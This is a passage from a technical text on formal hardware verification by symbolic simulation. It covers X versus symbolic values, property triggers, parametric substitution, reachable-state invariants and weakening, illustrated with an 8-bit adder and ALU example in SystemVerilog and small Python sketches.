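def OR(u, v):  return tuple(x | y for x, y in zip(u, v))

a, b, c = var('a'), var('b'), var('c')
lhs = OR(a, AND(b, NOT(c)))                        # a|(b&~c), as in Fig. 7
rhs = NOT(AND(NOT(a), NOT(AND(b, NOT(c)))))        # a De Morgan rewriting
print(lhs == rhs)                                  # True: canonical forms agree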
As a slight departure from tradition, to help theory development, we have chosen
the image set of symbolic Booleans in Definition 9 to be X, including the undefined
value X, instead of the more common B = {0, 1}. The symbolic Booleans in the
sense of Definition 9 can easily be implemented in terms of standard symbolic
Booleans, for example, with a dual-rail representation (Bryant and Seger 1990).
Simulation with Symbolic Values
In a symbolic simulation, symbolic variables are associated with specific signals at specific times in the stimulus.
Associating a variable with a signal at a time effectively says that the value of the
signal at the time is either 0 or 1 (and not X) and that the actual value is not fixed,
but instead the symbolic variable is used to refer to what the value is.
Consider the symbolic stimulus and trace in Fig. 8 for the adder circuit of Fig. 3.
In addition to the 0, 1, and X values, the stimulus contains the 16 symbolic variables
a[7] . . . a[0] and b[7] . . . b[0]. In the simulation, the symbolic values propagate
alongside the 0, 1, and X values, and in each logic gate, they are combined with
each other to result in either a logical expression on the symbolic variables or a 0,
1, or X value.
For example, the symbolic variable a[0] is associated with signal datainB[1][0]
in simulation cycle 2, b[0] with datainB[2][0] and so on. Variable a[0] propagates
from signal datainB[1][0] in cycle 2 to datainC[1][0] in cycle 3 through a flip-flop,
then through datamskC[1][0] and to sumrawC[0], where it is combined with b[0]
to yield (a[0]&!b[0]+!a[0]&b[0]). This value propagates to sumC[0] in cycle 3 and
finally to output sumD[0] in cycle 4 through a flip-flop. Figure 9 depicts this path,
annotated with the signal values in the cycle relevant to each signal. In all other
simulation cycles, all signals in the picture have the value X, except for the constant
mskC[0].
The symbolic expressions for the result bus sumD in cycle 4 can be extracted
from the trace and compared to a reference model result computed by adding
together the two symbolic variable vectors {a[7] . . . a[0]} and {b[7] . . . b[0]}. Alter-
natively, the SVA correctness property add8ok of Fig. 4 can be included in the
symbolic simulation in Fig. 8, performing the addition of the input data values and
comparison to the result bus as a part of the property simulation in cycle 4.
[Fig. 8: symbolic stimulus and trace; avldB and add8B asserted in cycle 2; datainB[1][15:0] = {X,…,X,a[7],…,a[0]} and datainB[2][15:0] = {X,…,X,b[7],…,b[0]}; response mskC = h00ff and sumD[15:0] = {0,…,0,…,a[0]&!b[0]+!a[0]&b[0]} in cycle 4]
[Fig. 9: the propagation path of a[0] from datainB[1][0] through datainC[1][0], datamskC[1][0], sumrawC[0], and sumC[0] to sumD[0], annotated with per-cycle values]
The idea of symbolic simulation as a verification method starts from the
observation that the stimulus in Fig. 8 does not place any restrictions on inputs
besides the Boolean values on the control signals avldB and add8B in cycle 2. The
symbolic variables associated with the data bus datainB in cycle 2 of the stimulus
allow every possible value combination to occur, and in the other cycles, both
control and data inputs have the undefined value X. The start state of the simulation
is also unrestricted. In this way, the single symbolic trace represents every point of
every Boolean trace of the circuit that agrees on the fixed Boolean values on the two
control signals. Since the property add8ok holds in the symbolic trace, we conclude
that it holds at every point of every Boolean trace of the system, for all possible
input patterns. Just for the data, the symbolic simulation is doing the work of 2^16
traditional simulations, one for each possible assignment of 0/1 values to the 16
symbolic variables. This intuition is captured mathematically in Theorem 3 below.
Both Xs and symbolic variables in stimulus represent lack of information in that
they do not uniquely describe a value. However, their nature is different. The use
of X is an abstraction mechanism, while the use of symbolic variables is merely a
vehicle for doing the work of multiple concrete simulations in one simulation. A key
difference is illustrated in Fig. 10: Xs are pessimistic whereas symbolic values are
not. Also, there is only one X, whereas each symbolic variable refers to a specific
distinct Boolean value, although not to a fixed value. If an X is associated with
two different signals, there is no relation between the values of the signals. If the
same symbolic variable a is associated with two different signals, they are implicitly
restricted to have the same Boolean value, either both 0 or both 1.
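The contrast can be made concrete with the two value representations side by side; a self-contained toy, not the chapter's formalism:

def t_not(a):
    return 'X' if a == 'X' else 1 - a

def t_and(a, b):
    if a == 0 or b == 0: return 0
    if a == 'X' or b == 'X': return 'X'
    return 1

print(t_and('X', t_not('X')))    # X: the two Xs carry no mutual relation

a = (0, 1)                       # symbolic variable a as a truth table
NOT = lambda u: tuple(1 - x for x in u)
AND = lambda u, v: tuple(x & y for x, y in zip(u, v))
print(AND(a, NOT(a)))            # (0, 0): a & !a simplifies to the constant 0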
In practical symbolic simulation, the size of the symbolic expressions flowing
in the wires during the simulation is the most crucial complexity metric and almost
always the limiting factor determining the applicability of the method, as simulation
with 0s and 1s is cheap and simulation with Xs is even cheaper. Later in this chapter,
we look at a host of techniques for managing this complexity.
Fig. 10 Undefined value vs symbolic variable propagation: X ∧ ¬X evaluates to X, whereas a ∧ ¬a simplifies to 0
When symbolic values are expressed using BDDs, the comparison between
circuit and reference model results is trivial. For the two to agree, the expressions
computed by both must be identical because of canonicity.
When AIGs are used to represent symbolic values, the simulation needs to be
connected to an external SAT solver to determine the consistency between the circuit
and a reference model or the validity of a checker property. One way of looking at
the usage of AIGs instead of BDDs for the simulation is as a tradeoff of complexity
during simulation versus complexity after the simulation.
Definition 10. We define the concepts of symbolic state and symbolic trace; the
functions valid, ones, zeros, and char; the relations ⊑ and ⊑B; and related concepts
for symbolic traces as in Definitions 5, 6, 7 and 8, by replacing the set X with S, and
by replacing all references to circuit excitation and property functions and 0, 1, and
X with their symbolic lifts. Every (stimulus) trace T can be viewed as a symbolic
(stimulus) trace by replacing every 0, 1, and X in the image of T with their symbolic
lifts.
Definition 11. We say that a symbolic stimulus trace T is universal if for every
Boolean stimulus trace T′ such that T ⊑B T′, there exists a ∈ VA such that
inst(a)(T) ⊑ T′.
Practical Considerations
No fixed-point computation takes place in the symbolic simulation, and the property is
verified relative to one single fixed time point of the symbolic trace. As the fixed-
point computation is the expensive part of model checking, this latter aspect sets
the two methods far apart regarding computational complexity. Of course, it also
restricts what can be verified.
The practice of formal verification with symbolic simulation is also very different
from common model checking. The former is at heart an interactive computer-aided
verification method guided by human intuition about the circuit under verification.
The latter strives to be a fully automated approach that still in reality requires careful
human intervention in the ways the tool is invoked to guide it past complexity
bottlenecks.
While a successful verification of a property with symbolic simulation always
guarantees its validity, the inverse is not true. The validation of a property often
fails just because some signal values it refers to are Xs in the simulation: Without
knowing what the values are, the validity of the property cannot be determined.
A large part of the human verification effort goes to root-causing these Xs and
strengthening the stimulus by associating symbolic variables with more signals.
From the user perspective, verification of a property by focusing on a single instance
of it in symbolic simulation is somewhat analogous to looking at a single instance
of a property in bounded model checking (BMC). In both cases, there is a fixed-
length sequence from a start state, on which the property either holds or is violated.
One difference is that in BMC, the start state is initialized, whereas in symbolic
simulation, it is unrestricted. Also, in BMC, the sequence is represented by a series
of unrolled next-state relations, whereas in symbolic simulation, the effects of the
circuit computation are gradually accumulated into the expressions flowing in the
wires in the simulation. Considering the unrestricted start state, symbolic simulation
is conceptually similar to an extreme case of k-induction, for the case k = 0.
However, the usage models of the two methods are quite disparate, one stressing
automation and the other user guidance, and it is unclear what practical implications
could be drawn from parallels between them.
Property Triggers
Symbolic simulation verification tasks are phrased as properties of the form
(trig1 ∧ … ∧ trign) |−> (goal1 ∧ … ∧ goalm),
where the individual triggers trigi and verification goals goali are fixed time
window properties. Of course, every fixed time window invariant can be trivially
expressed in this form by leaving the trigger empty and having the given property
as the single goal. However, the efficiency of the method is highly dependent on
the triggering conditions restricting both the scope of circuit logic that needs to be
simulated and the size of the expressions in the simulation. If symbolic variables are
associated with all inputs in the stimulus without any triggering conditions, all the
simulation does is to copy the circuit logic syntactically into the expressions flowing
in the wires.
Consider the 8-bit adder example of Fig. 3 and the propagation of values in the
pipeline with the stimulus in Fig. 8. Corresponding to the triggers avldB and add8B
of the property add8ok in Fig. 4, the stimulus sets the values of these signals to 1 at
cycle 2. In the simulation, due to the values propagating in the pipeline, the signal
add8C has value 1 in cycle 3. This value 1 is used to compute the mask vector
mskC leading to the high bytes of datainC being zeroed in datamskC before the
addition takes place in signal sumrawC. Now, when adder logic is simulated, only
8-bit symbolic addition needs to be computed, even though the circuit contains logic
for 16-bit addition.
The discussion above glossed over the detail of how the triggers of the property
add8ok in Fig. 4 became the fixed values for avldB and add8B in cycle 2 in the
stimulus of Fig. 8. It is not difficult to imagine an algorithm, though, that would
derive such fixed values from the triggers of a given property and a user-supplied
reference cycle for checking its goals, in this instance the property add8ok and
cycle 4. The question is more general, however. In the add8ok example, the triggers
are particularly simple and directly correspond to fixed Boolean stimulus values.
This is generally not the case, and individual trigger conditions may be satisfied by
multiple alternative value assignments. Yet, it is important to restrict the scope of
the simulation only to the cases where the triggers are satisfied. Any other cases do
not matter for the verification goals, and incurring the cost of simulating such cases
is effort wasted.
To illustrate this issue, let us introduce another execution unit mul for multi-
plication and combine the adder and multiplier to a simple ALU with different
latencies, two cycles for add and three cycles for mul, as in Figs. 11, 12, and 13.
The ALU circuit contains powerup logic for the subunits, decoding the operation
code opA, and optional power-saving logic that turns on the clock to a subunit only
when there is an operation going through it. Each subunit powers up for five cycles
when needed. A reset signal rst turns on the clocks and clears the valid signals going
through the units. A high power mode switch PWRHI overrides the power-saving
logic and forces clocks to both subunits to toggle freely. For the time being,
assume the PWRHI override to be 1.
The 8-bit adder correctness property can be moved to the ALU level as in Fig. 14.
In the context of the ALU circuit, however, it is not sufficient to assert just the
valid signal and the operation control for the ADD8 operation, as the presence of
the three-cycle MUL creates a pipeline hazard. For the addition operation to work,
there cannot be a MUL operation starting a cycle earlier. This requirement can be
incorporated into the correctness property as a third trigger as in Fig. 15.
Consider then the verification of the property alu8okB of Fig. 15, with focus on
cycle 4 for checking the goal of the property. Informally this could be done by
[Figs. 11 and 12: schematics of the ALU, with the add subunit spanning pipestages A to D and write-back wbW in stage W, and the mul subunit computing partial products pp and product prd across pipestages A to E]
module mul( input mclk, mvldB, input [15:0] datainB [2:1],
            output bit mvldE, output bit [15:0] prdE ); // header reconstructed from the instantiation in Fig. 13
bit mvldC, mvldD; bit [15:0] datainC[2:1], ppC[16], ppD[16], prdD; int i; // declarations reconstructed
`FF( mvldC, mvldB, mclk ); `FF( datainC, datainB, mclk ); // flop pipestage B->C
always_comb for (i=0;i<16;i=i+1) // partial products
ppC[i]=(datainC[1]<<i)&{16{datainC[2][i]}};
`FF( mvldD, mvldC, mclk ); `FF( ppD, ppC, mclk ); // flop pipestage C->D
always_comb begin
prdD=16'b0;for (i=0;i<16;i=i+1) prdD=prdD+ppD[i];end // sum partial products
`FF( mvldE, mvldD, mclk ); `FF( prdE, prdD, mclk ); // flop pipestage D->E
endmodule
simulating an ADD8 operation that starts in pipestage A in cycle 1 and writes back
the result in cycle 4. The first and second triggers of alu8okB correspond naturally
to fixed values vldA = 1 and opA = ADD8 = 01 in cycle 1. The third trigger
can be satisfied in two ways: either when vldA ≠ 1 or when opA ≠ MUL = 11
in cycle 0. It can be seen informally from the circuit logic in Fig. 16 that under this
restriction the internal signal mvldA is equal to 0 in cycle 0, and the value propagates
to mvldE in cycle 4, allowing the ADD8 result through the write-back mux and
ignoring any value coming from the multiplier. However, there is no fixed value
assignment that would match the third trigger. Some assignment could be picked,
but that would ignore the other ways of satisfying the trigger. Iterating over all
possible assignments that make the trigger true could be considered, but in general,
the number of such assignments is exponential in the number of bits involved. An
optimal solution would be to symbolically simulate all cases where the trigger is
satisfied, and only those, in a single simulation. The next subsection focuses on
techniques enabling precisely that.
parameter NOP = 2'b00, ADD8 = 2'b01, ADD16 = 2'b10, MUL = 2'b11, PWRHI = 1'b1;
module alu( input rst, clk, vldA, [1:0] opA, [15:0] datainB [2:1],
output reg vldW, reg [15:0] wbW );
bit aclk, avldA, add8A, avldB, add8B, avldD, mclk, mvldA, mvldB, mvldE;
bit [15:0] sumD, prdE; bit [4:0] avldN, mvldN;
add add( aclk, avldB, add8B, datainB, avldD, sumD ); // add, pipestages B->C->D
mul mul( mclk, mvldB, datainB, mvldE, prdE ); // mul, pipestages B->C->D->E
property alu8okB;
@(posedge clk)
( $past(vldA,3) &&
( $past(opA,3)==ADD8 ) &&
~( $past(vldA,4) && ($past(opA,4)==MUL) )
) |->
( wbW[7:0] == $past(datainB[1][7:0],2) + $past(datainB[2][7:0],2) );
endproperty
[Fig. 16: the decode and staging logic; mvldA = vldA & opA[1] & opA[0], staged through the mvldB, mvldC, mvldD, and mvldE flops, which are cleared by rst]
Parametric substitution proceeds in three steps (a sketch of the resulting coverage check follows the list):
1. Simulate the triggers on stimulus which associates symbolic variables with all
signals and times the triggers refer to.
2. Compute parametric substitution from the trigger expressions from step 1.
3. Apply the substitution from step 2 to the stimulus and simulate the property
goals.
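What step 2 must deliver can be sketched in miniature with a hand-made candidate substitution for the trigger ~(v0 & c0[1] & c0[0]); the substitution below is invented for illustration, whereas tools derive theirs automatically:

from itertools import product

def trigger(v0, c1, c0):
    return not (v0 and c1 and c0)

def subst(p0, p1, p2):                   # candidate parametric substitution
    v0, c1 = p0, p1
    c0 = int(p2 and not (p0 and p1))     # forced to 0 only when v0 = c1 = 1
    return (v0, c1, c0)

image = {subst(*p) for p in product((0, 1), repeat=3)}
sat = {t for t in product((0, 1), repeat=3) if trigger(*t)}
print(image == sat)     # True: the image is exactly the trigger's satisfying set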
[Fig. 17: stimulus for the trigger simulation; variables v0 and v1 are associated with vldA, and c0[1:0] and c1[1:0] with opA, at the cycles referenced by $past(*,3) and $past(*,4), for goal reference cycle t = 4]
[Fig. 18: the stimulus after parametric substitution; opA carries the fixed value 01 (ADD8) in cycle 1, vldA carries v0 & (!c0[0]+!c0[1]) in cycle 0, independent symbolic variables a and b are associated with datainB, and the verified response is wbW[15:0] = {0,…,0,…,a[0]&!b[0]+!a[0]&b[0]}]
The three target expressions of the substitutions refer to the three variables v0, c0[1],
and c0[0]. The values of these three expressions for the eight possible Boolean
assignments for the variables cover every combination except 1-1-1, i.e., the exact
set of assignments that makes ¬(v0 ∧ c0[1] ∧ c0[0]) true.
At step 3 in the parametric substitution process, the substitutions are applied to
the stimulus of Fig. 17, resulting in the stimulus in Fig. 18. Independent symbolic
variables are added for the data bus, and finally the goal of the property alu8okB
of Fig. 15 is simulated. The resulting simulation now covers exactly the cases
where the trigger conditions hold. With the stimulus of Fig. 18, the computation of
mvldA in cycle 0 occurs as in Fig. 19, resulting in the value 0. When parametric
substitutions are used in a BDD-based simulation, such internal simplifications
happen automatically, due to the canonicity of BDDs.
Fig. 19 Internal simplification: the conjunction v0 & (!c0[0]+!c0[1]) & c0[0] & c0[1] feeding mvldA simplifies to the constant 0 in cycle 0, which then propagates through mvldB to mvldE in cycles 1 to 4
If AIGs are used for logical expressions instead of BDDs, it is still advantageous
to derive all the constant signal assignments from the triggers, as they help to
simplify circuit logic. The rest of the parametric substitution method, on the other
hand, is not useful with AIGs. Instead, internal simplifications need to be explicitly
enabled in the simulator, for example, by speculative SAT calls checking whether
the expression for an internal signal in the simulation is equivalent to a Boolean 0
or 1 under the trigger conditions. The limiting factor in this respect is the number
of circuit signals in the simulation, which means that the time that can be spent on
simplification per signal is very short, or the user must be able to judiciously guide
the tool to attempt simplification only on certain signals.
The usual default strategy is to attempt to maximize internal simplifications
because of the resulting reduction in simulation scope. This also helps goal check-
ing: if the simulation is done using BDDs and all triggers are used for parametric
substitutions, it is sufficient to just check that all goals evaluate to 1s in the
simulation. However, there are cases when the cost of computing the simplifications,
especially the cost of computing the parametric substitutions, exceeds the savings
it has provided. In these cases, it may be better not to use some of the triggers for
simplification. Instead, they need to be factored in when checking the validity of the
verification goals after the simulation. If the simulation is done using non-canonical
symbolic representations with a SAT call in the end, all triggers are used as
assumptions for the goal checking by default. When simulation is done
using BDDs, however, extra post-simulation work is needed to check whether the
symbolic expressions for the triggers imply the symbolic expressions for the goals.
A methodology and a tool called Conjver to address this question while avoiding
prohibitive BDD growth is discussed in Kaivola (2005).
Reachable-State Invariants
The example circuits so far have not required any initialization. They can be brought
up in an arbitrary state and still work correctly. For verification based on symbolic
simulation, this is the optimal scenario, matching the maximally unrestricted start
state of the simulation. Reset-free circuits are, of course, an anomaly, and most
circuits require initialization to bring them to an internally consistent state to
guarantee correct behavior. In traditional model checking, the initialization and
reachable-state analysis automatically guarantees that only circuit states satisfying
such basic consistency are considered, although there is a computational cost for
this analysis. In verification by symbolic simulation, on the other hand, accounting
for such internal circuit consistency requires human effort. It is done through the
manual formulation of consistency invariants and the explicit addition of them to
the set of triggers in a simulation.
Consider now the ALU circuit in Fig. 13 with the low power mode enabled,
i.e., the parameter PWRHI defined as 0. In this circuit, the triggers of the adder
correctness property alu8okB in Fig. 15 no longer guarantee correct 8-bit adder
behavior in a simulation started from an arbitrary state without reset. If the circuit is
powered up in a state where mvldE is high and no reset happens, mvldE continues to
stay high until the first MUL operation occurs, because the clock to the mul subunit
does not toggle. During this time, mvldE corrupts every ADD result at the result
write-back mux. This does not happen in initialized traces, since reset clears mvldE,
and it is only set again when a valid MUL operation finishes its pipeline, after which
it is again cleared. What the triggers are missing is this fact expressed as an internal
consistency invariant: the property mvldEok in Fig. 20, which is universally valid in
every initialized trace of the circuit.
The property alu8okB can be augmented by adding an instance of the invariant
mvldEok to the triggers as in Fig. 21. By Boolean simplification, for example, by
parametric substitutions, the triggers together then imply that mvldE is 0 in cycle 4,
which allows the addition result to flow through the result mux exactly as in Fig. 18.
Just considering the simulation, there is no difference between the new trigger
and the previous ones. They are all assumptions restricting the scope of the claim
under verification. However, methodologically, the different triggers have distinct
roles:
property mvldEok;
@(posedge clk)
( mvldE == ( $past(vldA,4) && ( $past(opA,4) == MUL ) ) );
endproperty
assert property(mvldEok);
property alu8okC;
@(posedge clk)
( $past(vldA,3) &&
( $past(opA,3)==ADD8 ) &&
~( $past(vldA,4) && ($past(opA,4)==MUL) ) &&
( mvldE == ( $past(vldA,4) && ($past(opA,4)==MUL) ) )
) |->
( wbW[7:0] == $past(datainB[1][7:0],2) + $past(datainB[2][7:0],2) );
endproperty
– The first and second triggers are inherent to the property being verified: if an ADD8
operation is executed, then the ADD8 result is correct.
– The third trigger is an instance of an external assumption, reflecting an expecta-
tion that MUL and ADD8 operations should not execute in patterns that would
lead to pipeline hazards.
– The last trigger is an instance of an internal invariant that is expected to be
universally true in every initialized trace of the circuit.
An implicit expectation is that the latter two triggers are universally true in the
normal operating circumstances of the circuit whenever the basic triggers are true
and, therefore, do not really constitute restrictions to the scope of the verification.
This classification of simulation triggers to basic triggers, external assumptions,
and internal invariants is ubiquitous in verification based on symbolic simulation, as
is the belief that the latter two classes are just auxiliary helpers that do not restrict
what is “really” verified. In other words, the verification of the property alu8okC
of Fig. 21 is expected to imply the original property alu8ok of Fig. 14, with only
the first two triggers. The validity of this expectation naturally depends on whether
the purported invariants are truly invariants. For internal invariants, the best practice
is to formally verify them by means of a traditional model checker. The validity
of the external assumptions is usually outside the scope of a formal effort and is
often checked by including the assumptions as simulation checkers in a traditional test
environment.
There is a human cost to identify and formulate the internal invariants which
over-approximate the reachable-state space of the system to the extent that is
necessary to enable the verification of the main validity goals, as well as to
determine the exact times at which these invariants should be instantiated as triggers
in the symbolic simulation task. There is also a computational cost in the validation
of these invariants through external means. The tradeoff of these costs is that they
obviate the cost of computing the reachable-state fixed point that traditional model
checking would need, enabling the method to handle substantially larger systems.
The number and type of internal invariants needed depends on the type of the design
and the property to be verified; however, in general, the cost tends to increase with
the number of feedback loops present in the circuit. For many straight pipeline
designs, most internal invariants needed are akin to the mvldEok invariant in Fig. 20
above, relating internal control signals to events at the circuit interface.
Complexity Management
Simulation Complexity
Complexity Analysis
The limits of computational capacity are the limits between what can and what
cannot be verified in practice. When attempting to resolve a computational capacity
challenge, the most crucial difference between symbolic simulation and traditional
model checking is that in symbolic simulation, a computational capacity problem
is virtually always extremely concrete. It manifests itself as a symbolic expression
that is too large, an expression that is associated with a particular node and time
in the simulation. This concreteness allows a human user to analyze, understand,
and resolve the problem with a degree of precision that is simply not available in
any other verification method that the authors are aware of. This amenability to
precise performance analysis is one of the key differentiators enabling the success
of symbolic simulation as a verification method.
Performance analysis is further assisted by the fact that the verification focuses
on exactly one instance of the property under verification in a symbolic trace. Not
only does a performance problem actualize in some specific signal at a specific time,
but the human verifier can also understand the role of that signal and time relative to
the property and the pipeline. Returning to the ADD8 example, consider the ADD8
operation in the ALU circuit in Figs. 11 and 13, which includes the mul unit. If
the user attempts to simulate using the triggers in Fig. 21, the simulation may not
complete successfully because the symbolic expressions generated during the
process grow too large. Assuming that the simulator has the ability to fail gracefully,
the user could then locate sample signals and times at which the large symbolic
expressions occur and find out that they are in the mul sub-circuit. Based on the
user’s knowledge about the circuit and the property, it could then be concluded that
this computation is simply unnecessary for the verification goal. The techniques to
guide the simulator to avoid such computations are discussed below.
The symbolic expressions flowing in the simulation are based on the symbolic
variables associated with specific signals and times in the stimulus. These variable
dependencies also help the user to understand what the circuit is attempting to
compute when there is a problem in the computation. For example, while for ADD8
the symbolic expressions related to the bit-vector addition are small enough that
practically any symbolic representation is able to handle them, for ADD16, this
is no longer the case, and a good variable ordering is a must for a succinct BDD
representation. If this fact had not been discovered yet, and an ADD16 simulation
was attempted, prohibitively large expressions would occur in the adder datapath.
This scenario is different from the expression growth in the MUL signals above,
now the problem signals are in the datapath for the operation under verification,
and they need to be computed to carry out the verification. Looking closer at
the expressions, the user would find out that they depend on symbolic variables
associated with the input data and that the expression size grows rapidly when
going from lower to higher bits in the datapath. This would lead the user to look
at the operation the data path is intended to compute, addition, and draw the lesson
from general knowledge about BDD behavior that the input data bits should be
interleaved in the variable ordering.
The expression size and variable dependency analysis is not only a feature of
BDD-based simulation. The authors have found these techniques extremely useful
also when the simulation is done with AIGs and the verification goal checking
is done using SAT. In practice, there appears a strong correlation between the
SAT solver performance and the size of the simulation expressions used as its
inputs. This allows the user to identify signals with large expressions, trace the
variable dependencies, and determine to what extent the expressions are expected to
contribute to the property under verification.
Weakening
The techniques for guiding the simulator to discard or not compute values for certain
signals and times during the simulation are collectively called weakening. There are
three main types of weakening:
1. Universal weakening
2. Cycle-specific weakening
3. Dynamic weakening
All these share the basic idea that at certain points in the simulation, the simulator
should replace a value it would otherwise compute with the undefined value X.
Since the value X abstracts any value, weakening is safe in the sense that any
property that is true over the weakened trace would also be true of the trace that
would be computed without the weakening. The converse is not true: The failure of a
property over a weakened trace may be caused by the weakening itself and does not
necessarily mean that the property is not valid.
In universal weakening, the user instructs the simulator to discard the values for a
certain set of signals across all times in the simulation and replace them with Xs. It
is equivalent to the concepts of “free” or “stop-at” present in many model checkers.
Effectively the fan-in logic for a weakened signal is discarded, and it becomes a new,
unrestricted input to the system. The behaviors of the weakened system naturally
over-approximate the original system. For example, in the ADD8 example in the
ALU circuit of Fig. 13, with the mul subunit, the input data signals to the mul subunit
could be universally weakened to prevent expression growth there.
Cycle-specific weakening is a more fine-grained version of universal weakening.
It allows the user to discard the values for a given set of signals, but instead of all
times only for a certain cycle or cycles, like a cycle-specific stop-at directive. This
technique is unique to symbolic simulation. The fact that it is even meaningful to
talk about signals at specific times in the verification task is directly related to the
fact that symbolic simulation focuses on just one fixed instance of the verification
goal.
For example, consider again the ADD8 operation in the ALU circuit in Figs. 11
and 13, and assume that the circuit is augmented with a bypass loop back from the
result to the inputs. When simulating the result write-back cycle, the addition result
on its way to the circuit output also loops back to the unit inputs through the bypass,
causing possible symbolic expression growth both in ADD and MUL. The issue
with the MUL can be resolved as above, by universally weakening its data inputs.
However, ADD inputs cannot be universally weakened, as the data for the ADD8
operation flows through these signals two cycles earlier. What can be done instead
is to weaken these signals at all other cycles than the one needed by the wave of data
for the ADD8 operation.
Cycle-specific weakening is an extremely versatile technique that allows the
users to apply their intuition about the usage of signals at times relative to the
progress of the operation under verification in the reduction of the simulation cost. A
common usage model is to weaken a signal at a given time and simultaneously associate
a fresh symbolic variable with it in the stimulus. Various algorithmic techniques
to automatically compute cycle-specific weakening sets based on the verification
goals, the circuit, and user intuition about the design intent are also frequently
applied.
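As a rough illustration, a weakening schedule of this kind could be represented as in the following Python sketch; the signal names, cycle numbers, and the maybe_weaken hook are hypothetical and merely mimic how universal and cycle-specific directives might be recorded, not the interface of any actual tool.

ALL = 'all cycles'

# Hypothetical schedule for the ADD8 bypass scenario: the mul subunit
# inputs are weakened universally, while the shared adder inputs are
# weakened at every cycle except the one carrying the ADD8 operands.
weaken_at = {
    'mul.datain': ALL,
    'add.datain': set(range(10)) - {2},
}

def maybe_weaken(signal, cycle, value):
    # Called on every value the simulator is about to record;
    # 'X' is the undefined value.
    sched = weaken_at.get(signal)
    if sched == ALL or (sched is not None and cycle in sched):
        return 'X'
    return value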
The third technique, dynamic weakening, is based on looking at expressions as
they are computed in the simulation, instead of criteria fixed beforehand. In
its most basic form, the user can instruct the simulator to discard any symbolic
value and replace it with an X if the expression size for the value exceeds a user-
given threshold. In more advanced forms, the user can apply more fine-grained
thresholds that may depend on the simulation cycle, the signal name or hierarchy, or
the presence or absence of certain symbolic variables in the expression. Dynamic
weakening is a very robust technique that in many instances allows the user
to quickly resolve complexity issues caused by the computation of unnecessary
expressions in the simulation, without the need of more detailed analysis. Dynamic
weakening works especially well when there is a reasonable upper bound on the
sizes of the expressions needed for the verification goal. For example, in ADD8
verification in the ALU circuit, all the issues with expression growth in the mul
subunit or through the bypass could be resolved by setting a simple dynamic
weakening limit just above the relatively small expression size needed by the adder.
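In the same hypothetical Python setting, the basic form of dynamic weakening can be sketched as a size check grafted onto ternary gate evaluation: any freshly computed expression above the user-given threshold is discarded as X, while the usual ternary rules still let a controlling 0 mask a weakened fan-in.

X = 'X'  # the undefined value

def expr_size(e):
    # crude node count over a tuple-based expression representation,
    # where a leaf is a variable name or a constant
    return 1 + sum(expr_size(a) for a in e[1:]) if isinstance(e, tuple) else 1

def sim_and(a, b, limit):
    # ternary AND: a controlling 0 dominates even X
    if a == 0 or b == 0:
        return 0
    if a == X or b == X:
        return X
    if a == 1:
        out = b
    elif b == 1:
        out = a
    else:
        out = ('and', a, b)
    # dynamic weakening: discard any expression above the size threshold
    return X if expr_size(out) > limit else out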
The concreteness of symbolic simulation gives the verification engineer fine-
grained visibility into the computations on the level of individual signals, enabling
precise analysis and mitigation of computational complexity bottlenecks through
weakening. However, the determination of which signals at which simulation times
are really needed for a specific verification goal is often a time-consuming task.
In many cases this task can be automated by the technique of timed causal fanin
analysis (Kaivola and Bar Kama 2022). This method is based on the use of
information from a preliminary, more approximate, symbolic simulation run done
with a low dynamic weakening threshold, to compute a tight fanin cone of interest
for the verification goals, weakening all other circuit logic in the main symbolic
simulation run. The method combines the principles of cone-of-influence (COI)
reduction and constant-based model reduction on a cycle-by-cycle basis.
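The two-pass structure of this analysis can be sketched as follows; simulate, timed_fanin, and value are hypothetical stand-ins for tool entry points, so the sketch only conveys the shape of the flow described in Kaivola and Bar Kama (2022), not its actual interface.

def timed_causal_fanin_flow(simulate, goals, low_limit):
    # Pass 1: a cheap, approximate run with an aggressively low dynamic
    # weakening limit; most internal values collapse to X, but the trace
    # still shows which (signal, cycle) pairs feed non-X values into the
    # verification goals.
    approx = simulate(dynamic_limit=low_limit)
    cone = {(sig, cyc)
            for (sig, cyc) in approx.timed_fanin(goals)
            if approx.value(sig, cyc) != 'X'}
    # Pass 2: the main run, weakening every signal/cycle pair outside
    # the computed cone of interest
    return simulate(weaken_outside_cone=cone)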
Verification Flow
[Figure: a symbolic simulation waveform over cycles 0–9 for the ALU example, showing the clock clk and reset rst, the stimulus signals vldA, opA[1:0], datainB[1][15:0], and datainB[2][15:0] carrying symbolic data a[7:0] and b[7:0], and the response signals mvldA, mvldE, avldA, avldD, and the write-back bus wbW[15:0] carrying the symbolic addition result.]
more conventional formal tools. However, there are essential differences. First, in
symbolic simulation, the variable names occurring in expressions give direct insight
into the flow of values in the simulation. Second, environment assumptions are not
automatically instantiated in symbolic simulation: to take effect, they must be
explicitly added by the user to the triggers of the simulation. This is deliberate,
since instantiated assumptions can be a major source of computational complexity,
alongside circuit scope, and user control is essential in containing this complexity.
Once stimulus for a successful simulation in an overconstrained environment
has been constructed, the overconstraints are gradually removed and replaced by
reachable-state restrictions reflecting the expected real operating environment of the
design. For example, in verification of the alu8ok property in Fig. 14, the user might
first remove the restriction that vldA is asserted just once, allowing other possibly
interfering operations to take place. If only the original two triggers of alu8ok
are present, in this first step, the user would observe an undefined X value in the
result write-back bus, trace it through the result write-back mux to a control signal
coming from the multiplier, realize that a scheduling constraint between the MULs
and ADDs is needed for proper behavior, and either instantiate a property already
present in the model in the trigger or formulate the needed scheduling constraint
and then instantiate it, as in property alu8okB in Fig. 15. In the second step, the
user would remove the initial reset and enable the low power mode, leading to a
fully general stimulus. In this stage, the user would notice the need for an internal
invariant between the mvldE signal and the interface control signals as in Fig. 20
and add the invariant to the trigger, as in property alu8okC of Fig. 21.
The simulation X values are a powerful means for detecting design bugs caused
by unintentional interferences. In the example system, the X values could be root-
caused to missing external or internal invariants. Equally well, the debug process
could lead to an observation that the result of an operation can be corrupted by
another simultaneously executing operation, a design bug. The strengthening of the
stimulus and the trigger primarily takes place through identification of restrictions
that are strong enough to narrow the set of behaviors to exclude the problematic
propagation of values while being weak enough that the verifier still expects them
to hold in all properly initialized states. Human insight is needed in the loop to
identify and articulate the reachable-state invariants. The verification done by the
simulation is, of course, only as strong as these restrictions, and therefore, it is
important that they are well validated, for example, by including the restrictions
as run-time checkers in the dynamic simulation environment for the design or by
verifying the internal invariants by other formal means.
Arithmetic Circuits
Direct Verification
would look like and how a particular variable ordering would affect it. In practice,
most BDDs tend to be too large to be intuitively grasped by just visualizing them
as graphs. Instead, the authors have found it a useful conceptual tool to consider
the BDD as a machine that reads an assignment of values to the symbolic variables
in a linear sequence according to the variable ordering and produces the result of
the function for that assignment. After having read the assignments to the first n
symbolic variables, the machine must retain enough information about the values
already read to properly compute the function for all possible assignments to the
